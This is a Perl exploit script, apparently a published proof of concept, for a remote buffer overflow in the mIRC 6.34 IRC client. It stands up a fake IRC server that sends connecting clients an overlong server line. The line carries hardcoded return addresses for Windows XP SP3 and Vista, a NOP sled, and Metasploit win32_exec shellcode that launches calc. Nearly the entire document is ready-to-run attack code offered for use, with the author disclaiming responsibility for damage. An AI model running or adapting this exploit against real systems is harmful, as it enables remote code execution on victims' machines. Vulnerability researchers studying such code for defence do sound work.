#!/usr/bin/perl # # # mIRC 6.34 Remote Buffer Overflow Exploit # Exploit by SkD (skdrat hotmail <.> com) # ---------------------------------------- # A day's work of debugging and looking at mIRC. # # Tested on Windows XP SP3 English and Windows Vista SP0. # # Credits to securfrog for publishing the PoC. # # Author has no responsibility over the damage you do with this! # # Note: You might change the addresses for Vista ;) # # ---------------------------------------- use IO::Socket; if(!($ARGV[1])) { print "\n[x] mIRC 6.34 Remote Buffer Overflow Exploit\n"; print "[x] Exploit by SkD (skdrat@ hotmail.com)\n\n"; print "[x] Use: mirc_exp.pl \n[x] Example: mirc_exp.pl 6667 0\n\n"; exit; } while(1) { my $sock=new IO::Socket::INET ( Listen => 1, LocalAddr => '127.0.0.1', LocalPort => $ARGV[0], Proto => 'tcp'); die unless $sock; # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com my $shellcode = "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e". "\x95\x97\xf1\x83\xeb\xfc\xe2\xf4\xe2\x7d\xd3\xf1\x1e\x95\x1c\xb4". "\x22\x1e\xeb\xf4\x66\x94\x78\x7a\x51\x8d\x1c\xae\x3e\x94\x7c\xb8". "\x95\xa1\x1c\xf0\xf0\xa4\x57\x68\xb2\x11\x57\x85\x19\x54\x5d\xfc". "\x1f\x57\x7c\x05\x25\xc1\xb3\xf5\x6b\x70\x1c\xae\x3a\x94\x7c\x97". "\x95\x99\xdc\x7a\x41\x89\x96\x1a\x95\x89\x1c\xf0\xf5\x1c\xcb\xd5". "\x1a\x56\xa6\x31\x7a\x1e\xd7\xc1\x9b\x55\xef\xfd\x95\xd5\x9b\x7a". "\x6e\x89\x3a\x7a\x76\x9d\x7c\xf8\x95\x15\x27\xf1\x1e\x95\x1c\x99". "\x22\xca\xa6\x07\x7e\xc3\x1e\x09\x9d\x55\xec\xa1\x76\x65\x1d\xf5". "\x41\xfd\x0f\x0f\x94\x9b\xc0\x0e\xf9\xf6\xf6\x9d\x7d\x95\x97\xf1"; print "[x] Listening on port ".$ARGV[0]."..\r\n"; $s=$sock->accept(); print "[x] Got a user!\r\n"; $overflow = "\x41" x 307; $overflow2 = "B" x 12; $eip_vista = "\x66\x1c\xc2\x76"; #Normaliz.DLL pop pop ret $eip2_vista = "\xd3\xdb\x54\x77"; #MSFCT.DLL jmp esp $eip_xpsp3 = "\xd1\xfb\x92\x77"; #SETUPAPI.DLL 0x7792FBD1 pop eax pop ret $eip2_xpsp3 = "\xb7\x87\x9d\x77"; #SETUPAPI.DLL 0x779D87B7 jmp esp $addr = "\xb5\xb5\xfd\x7f"; $nop_sled = "\x90" x 4; $jmp = "\xEB\x03\xFF\xFF"; print "[x] Sending packets..\r\n"; print $s ":my_irc_server.com 001 wow :Welcome to the Internet Relay Network wow\r\n"; sleep(1); if($ARGV[1] == "1"){ print $s ":".$overflow.$eip_xpsp3.$addr.$nop_sled.$eip2_xpsp3.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG wow : /FINGER wow.\r\n"; }else{ print $s ":".$overflow.$eip_vista.$addr.$nop_sled.$eip2_vista.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG wow : /FINGER wow.\r\n"; } print "[x] Check it out!\r\n"; }